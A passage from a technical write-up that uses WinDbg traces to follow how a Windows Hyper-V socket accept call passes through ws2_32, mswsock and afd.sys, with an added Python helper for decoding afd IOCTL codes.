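<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run this way, the blue GUID after the 00000022 dword decodes to HV_GUID_CHILDREN, so the listener is bound to accept connections from any child partition; the red GUID is the service ID it listens on, and the final dword is the handle 144h that the accept call uses below. The same helper works for any dd dump of a SOCKADDR_HV, for example one captured at the bind call.</span></div>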
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We return to our application, and the accept call is executed.</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Accept</span></div>
</li>
</ol>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ws2_32!WSAAccept is called, then mswsock!WSPAccept, then ntdll!NtDeviceIoControlFile:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F5D0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1200C (afd!AfdWaitForListen). Interestingly, IOCTL 12090 is handled by the same function.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F730</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
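<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A note on the IOCTL value itself, since it trips up the usual decoders: afd.sys does not build its control codes with the generic CTL_CODE() layout (device type in the top 16 bits), but as FILE_DEVICE_NETWORK (12h) shifted left by 12, the request number shifted left by 2, and the transfer method in the low two bits. The generic layout therefore misreads 1200Ch as device type 1. The decoder below is an added example, not from the article; the request numbers it names are the ones from the public afd definitions (as in ReactOS's afd headers) that I am certain of, and request 36 (IOCTL 12090h) is deliberately left unnamed because the page does not identify it.</span></div>

```python
"""Decode afd.sys control codes such as 0x1200C (AfdWaitForListen) and 0x12090.

Added example. afd encodes its IOCTLs as
    FSCTL_AFD_BASE << 12 | request << 2 | method      (FSCTL_AFD_BASE = FILE_DEVICE_NETWORK = 0x12)
rather than with the generic CTL_CODE() macro, so both layouts are decoded here
side by side.
"""

FILE_DEVICE_NETWORK = 0x12
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}

# Request numbers from the public afd definitions. Only the ones the author of
# this example is certain of are listed; anything else decodes to AFD_REQUEST_<n>.
AFD_REQUESTS = {
    0: "AFD_BIND",
    1: "AFD_CONNECT",
    2: "AFD_START_LISTEN",
    3: "AFD_WAIT_FOR_LISTEN",
    4: "AFD_ACCEPT",
    5: "AFD_RECV",
    7: "AFD_SEND",
}


def decode_ctl_code(code):
    """Generic CTL_CODE() layout: device<<16 | access<<14 | function<<2 | method.

    Applied to an afd code this is wrong (device type 1), which is exactly the
    trap the afd-specific decoder below avoids.
    """
    return {
        "device_type": code >> 16,
        "access": (code >> 14) & 3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 3],
    }


def decode_afd_ioctl(code):
    """afd layout: FSCTL_AFD_BASE<<12 | request<<2 | method."""
    base = code >> 12
    if base != FILE_DEVICE_NETWORK:
        raise ValueError(f"{code:#x} is not an afd control code (base {base:#x})")
    request = (code & 0xFFF) >> 2
    return {
        "base": base,
        "request": request,
        "name": AFD_REQUESTS.get(request, f"AFD_REQUEST_{request}"),
        "method": METHODS[code & 3],
    }


def afd_ioctl(request, method):
    """Inverse of decode_afd_ioctl: rebuild the code the way _AFD_CONTROL_CODE does."""
    return (FILE_DEVICE_NETWORK << 12) | (request << 2) | method


if __name__ == "__main__":
    for code in (0x1200C, 0x12090, 0x12003, 0x1201F):
        d = decode_afd_ioctl(code)
        print(f"{code:#07x}: request {d['request']:2d} {d['name']:<22} {d['method']}")
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">With this layout 1200Ch decodes to request 3 with METHOD_BUFFERED, which is why the call above carries only an output buffer, and 12090h decodes to request 36 with the same method; the page shows afd dispatching both to afd!AfdWaitForListen. Codes that use METHOD_NEITHER, such as 12003h (bind), are the ones where the driver reads user buffers directly and deserve the closest attention when auditing afd.</span></div>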
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdWaitForListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd+0x13</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is no input buffer, only an output buffer. Control passes to afd!AfdWaitForListen, which calls afd!AfdGetUnacceptedConnection. Its first parameter is an _AFD_CONNECTION; the element at offset +50h is compared with the address of the structure, and 0 is returned. Then afd!AfdCancelWaitForListen is written to IRP-&gt;CancelRoutine.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">No other functions are called and execution in afd.sys ends, but NtDeviceIoControlFile does not return directly to the application. Let's look at where control is transferred. Every nt system call ends with a sysret instruction, which transfers control to user mode at the address held in rcx.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>u @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtReadFile+0x14:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586194 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586195 cd2e int 2Eh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586197 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`41586198 0f1f840000000000 nop dword ptr [rax+rax]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtDeviceIoControlFile:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a0 4c8bd1 mov r10,rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a3 b807000000 mov eax,7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861b0 7503 jne ntdll!NtDeviceIoControlFile+0x15 (00007ff9`415861b5)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is only a single instruction (ret) at the return address, so let's look at the stack:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dqs @r8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbb98 00007ff9`3dfc3d34 – we get into SysWoW.dll. The stack at this moment looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dqs @r8 (r8 will be placed in rsp just before execution of swapgs, sysret)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbb98 00007ff9`3dfc3d34 KERNELBASE!ReadFile+0x74</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbba0 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The stack contents are changed during execution of nt!KeWaitForSingleObject -> nt!KiCommitThreadWait -> nt!KiSwapThread, called from nt!IopSynchronousServiceTail:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!NtReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ntdll!NtReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 KERNELBASE!ReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 SHCORE!CFileStream::Read</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 windows_storage!CShellLink::_LoadFromStream</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 windows_storage!CShellLink::_LoadFromFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 windows_storage!CShellLink::Load</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 windows_storage!InitializeFileHandlerWithFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a windows_storage!CFileSysItemString::HandlerCreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b windows_storage!CFSFolder::_BindHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c windows_storage!CFSFolder::GetUIObjectOf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d windows_storage!CShellItem::BindToHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e SHELL32!CAppResolver::GetAppIDForShortcut</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f SHELL32!CAppResolver::GetAppIDForWindow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 Explorer!CTaskBand::CResolveWindowTask::_ResolveWindowWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 Explorer!CTaskBand::CResolveWindowTask::_ResolveWindow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 Explorer!CTaskBand::CResolveWindowTask::InternalResumeRT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 Explorer!CRunnableTask::Run</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 windows_storage!CShellTask::TT_Run</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 windows_storage!CShellTaskThread::ThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 windows_storage!CShellTaskThread::s_ThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 SHCORE!ExecuteWorkItemThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 ntdll!RtlpTpWorkCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 ntdll!TppWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a KERNEL32!BaseThreadInitThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b ntdll!RtlUserThreadStart</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The return lands in another thread. This is probably a peculiarity of WoW64.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For a 64-bit process execution proceeds without surprises: after sysret we return to the end of the nt!NtDeviceIoControlFile function, from there control returns to mswsock!WSPAccept, and program execution stops inside the mswsock!SockWaitForSingleObject function.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="182" src="https://lh3.googleusercontent.com/JEskVL4EW66pcF8SwEdNVQPSRRjReqmh96Lrl4U_lQgusTqSO0hxtD6raCV-tWVfZuT_BMNFfpDKZm9d7P01iG-aftpwsBeb9rGCrmDQ8mGVbLBSfVA4mrtmhzDo5iP_kbmEJePuQHEnYvWiBg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="228" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Execution of the function continues only when the client side makes a </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">connect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> call. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Accept</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> execution then continues. mswsock!SockSocket is called (earlier it was called from </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; 